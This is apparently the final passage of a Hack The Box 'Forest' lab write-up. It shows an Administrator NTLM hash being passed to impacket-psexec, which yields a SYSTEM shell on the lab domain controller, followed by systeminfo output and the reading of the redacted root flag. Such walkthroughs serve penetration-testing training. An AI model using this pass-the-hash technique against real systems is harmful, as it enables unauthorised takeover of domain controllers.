Not uninstalling impacket at /usr/lib/python3/dist-packages, outside environment /usr
Can't uninstall 'impacket'. No files were found to uninstall.
Successfully installed impacket-0.9.23.dev1+20210519.170900.2f5c2476
[ 10.10.14.13/23 ] [ /dev/pts/30 ] [HTB/Forest/impacket]
→ sudo python3 setup.py install
Then use it with the admin hash:
[ 10.10.14.13/23 ] [ /dev/pts/30 ] [HTB/Forest/impacket]
→ impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 htb.local/Administrator@10.10.10.161
Impacket v0.9.23.dev1+20210519.170900.2f5c2476 - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on 10.10.10.161.....
[*] Found writable share ADMIN$
[*] Uploading file kvZZufbZ.exe
[*] Opening SVCManager on 10.10.10.161.....
[*] Creating service HFYI on 10.10.10.161.....
[*] Starting service HFYI.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>systeminfo
Host Name: FOREST
OS Name: Microsoft Windows Server 2016 Standard
OS Version: 10.0.14393 N/A Build 14393
OS Manufacturer: Microsoft Corporation
OS Configuration: Primary Domain Controller
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00376-30821-30176-AA930
Original Install Date: 9/18/2019, 10:07:59 AM
System Boot Time: 5/24/2021, 9:09:23 AM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: VMware, Inc. VMW71.00V.13989454.B64.1906190538, 6/19/2019
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume2
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 2,047 MB
Available Physical Memory: 635 MB
Virtual Memory: Max Size: 2,431 MB
Virtual Memory: Available: 990 MB
Virtual Memory: In Use: 1,441 MB
Page File Location(s): C:\pagefile.sys
Domain: htb.local
Logon Server: N/A
Hotfix(s): 3 Hotfix(s) Installed.
[01]: KB3199986
[02]: KB4512574
[03]: KB4103720
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) 82574L Gigabit Network Connection
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.161
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
C:\Windows\system32>cd ..
C:\Windows>cd ..
C:\>cd Users\Administrator\Desktop
C:\Users\Administrator\Desktop>type root.txt
f0XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it! We managed to get the root flag.
Here we can see the progress graph: